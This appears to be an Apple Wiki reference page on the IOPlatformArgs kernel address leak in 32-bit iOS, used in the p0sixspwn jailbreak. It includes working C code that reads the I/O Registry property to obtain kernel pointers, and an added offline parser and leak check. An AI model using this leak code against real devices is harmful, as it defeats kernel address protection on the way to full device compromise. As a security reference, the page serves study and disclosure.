IOPlatformArgs leak

From The Apple Wiki

The IOPlatformArgs vulnerability is a kernel information leak: the IOPlatformArgs property of the IOPlatformExpertDevice entry in the I/O Registry could be read from an unprivileged userland process and contained kernel virtual addresses (the device tree pointer and the boot_args pointer), from which the kernel base address can be derived. It was used in p0sixspwn.

#include <stdint.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>

/* Layout of the IOPlatformArgs property on 32-bit iOS: two kernel
   virtual addresses followed by two zero words. */
typedef struct {
  uint32_t deviceTreeP;  /* kernel VA of the device tree */
  uint32_t bootArgs;     /* kernel VA of the boot_args structure */
  uint32_t zero;
  uint32_t zero_1;
} platformArgs;

/* Reads IOPlatformArgs from IOPlatformExpertDevice and returns the kernel
   virtual address of boot_args, or 0 if the property cannot be read. */
static uint32_t
get_kernel_base_boot_args(void)
{
  platformArgs IOPlatformArgs = {0};
  CFDataRef data;
  io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
                                  IOServiceMatching("IOPlatformExpertDevice"));
  if (!platformExpert)
    return 0;
  data = IORegistryEntryCreateCFProperty(platformExpert, CFSTR("IOPlatformArgs"),
                                         kCFAllocatorDefault, 0);
  IOObjectRelease(platformExpert);
  /* The property may be absent, or present but not a CFData. */
  if (!data)
    return 0;
  if (CFGetTypeID(data) != CFDataGetTypeID()) {
    CFRelease(data);
    return 0;
  }
  if (CFDataGetLength(data) >= (CFIndex)sizeof(IOPlatformArgs))
    CFDataGetBytes(data, CFRangeMake(0, sizeof(IOPlatformArgs)),
                   (UInt8 *)&IOPlatformArgs);
  CFRelease(data);
  return IOPlatformArgs.bootArgs;
}

The function returns the kernel virtual address of boot_args, from which the kernel's virtual base is derived. Once the attacker knows the virtual base, the physical base follows from the kernel's fixed virtual-to-physical mapping (the virt_to_phys macro), so both bases are leaked. All of this relies on the IOPlatformArgs bug.
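The following is an added example, not code from the page or from p0sixspwn. It parses a raw IOPlatformArgs blob offline using the struct layout shown above, checks whether the two pointers fall in the kernel virtual address window (assumed here to be 0x80000000 to 0xC0000000 on 32-bit iOS), and applies the virt_to_phys step as XNU's static mapping defines it, pa = va - gVirtBase + gPhysBase, with gVirtBase and gPhysBase passed in as parameters because they are device-specific. The sample blob, the pointer values in it and the base values used in main() are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of the IOPlatformArgs blob on 32-bit iOS, as on the page above. */
typedef struct {
  uint32_t deviceTreeP;   /* kernel VA of the device tree */
  uint32_t bootArgs;      /* kernel VA of boot_args */
  uint32_t zero;
  uint32_t zero_1;
} platformArgs;

/* Assumption: 32-bit iOS kernel virtual addresses live in [0x80000000, 0xC0000000). */
#define KERNEL_VA_LOW  0x80000000u
#define KERNEL_VA_HIGH 0xC0000000u

/* Decode a little-endian 32-bit word (the property is stored in device byte order). */
static uint32_t rd32le(const uint8_t *p)
{
  return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
         ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the raw property bytes. Returns 0 on success, 1 if the blob is too
 * short, 2 if the two trailing words are not zero (layout mismatch). */
int parse_platform_args(const uint8_t *buf, size_t len, platformArgs *out)
{
  if (buf == NULL || out == NULL || len < sizeof(platformArgs))
    return 1;
  out->deviceTreeP = rd32le(buf);
  out->bootArgs    = rd32le(buf + 4);
  out->zero        = rd32le(buf + 8);
  out->zero_1      = rd32le(buf + 12);
  if (out->zero != 0 || out->zero_1 != 0)
    return 2;
  return 0;
}

/* 1 if the value looks like a kernel virtual address under the assumed window. */
int is_kernel_va(uint32_t va)
{
  return va >= KERNEL_VA_LOW && va < KERNEL_VA_HIGH;
}

/* The virt_to_phys step: XNU's static kernel mapping is a fixed offset,
 * pa = va - gVirtBase + gPhysBase. The bases are parameters (device-specific). */
uint32_t virt_to_phys(uint32_t va, uint32_t gVirtBase, uint32_t gPhysBase)
{
  return va - gVirtBase + gPhysBase;
}

/* Count the kernel virtual addresses a blob exposes; -1 if it does not parse.
 * A non-zero count means the property leaks kernel pointers to userland. */
int platform_args_leaks(const uint8_t *buf, size_t len)
{
  platformArgs args;
  if (parse_platform_args(buf, len, &args) != 0)
    return -1;
  return is_kernel_va(args.deviceTreeP) + is_kernel_va(args.bootArgs);
}

/* Constructed sample blob (not captured from a device): deviceTreeP = 0x8012f000,
 * bootArgs = 0x802a3c10, then two zero words, little-endian. */
static const uint8_t sample_blob[16] = {
  0x00, 0xf0, 0x12, 0x80,
  0x10, 0x3c, 0x2a, 0x80,
  0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00,
};

int main(void)
{
  platformArgs args;
  if (parse_platform_args(sample_blob, sizeof sample_blob, &args) != 0) {
    fprintf(stderr, "unexpected IOPlatformArgs layout\n");
    return 1;
  }
  /* Assumed per-device bases, for the example only. */
  uint32_t gVirtBase = 0x80000000u, gPhysBase = 0x40000000u;
  printf("deviceTreeP = 0x%08x (%s)\n", args.deviceTreeP,
         is_kernel_va(args.deviceTreeP) ? "kernel VA leaked" : "not a kernel VA");
  printf("bootArgs    = 0x%08x -> phys 0x%08x\n", args.bootArgs,
         virt_to_phys(args.bootArgs, gVirtBase, gPhysBase));
  printf("kernel pointers exposed: %d\n",
         platform_args_leaks(sample_blob, sizeof sample_blob));
  return 0;
}
```

To run this against a real device of that era, replace sample_blob with the bytes returned by IORegistryEntryCreateCFProperty for IOPlatformArgs, as in the function above; a non-zero result from platform_args_leaks is the check that the leak is present.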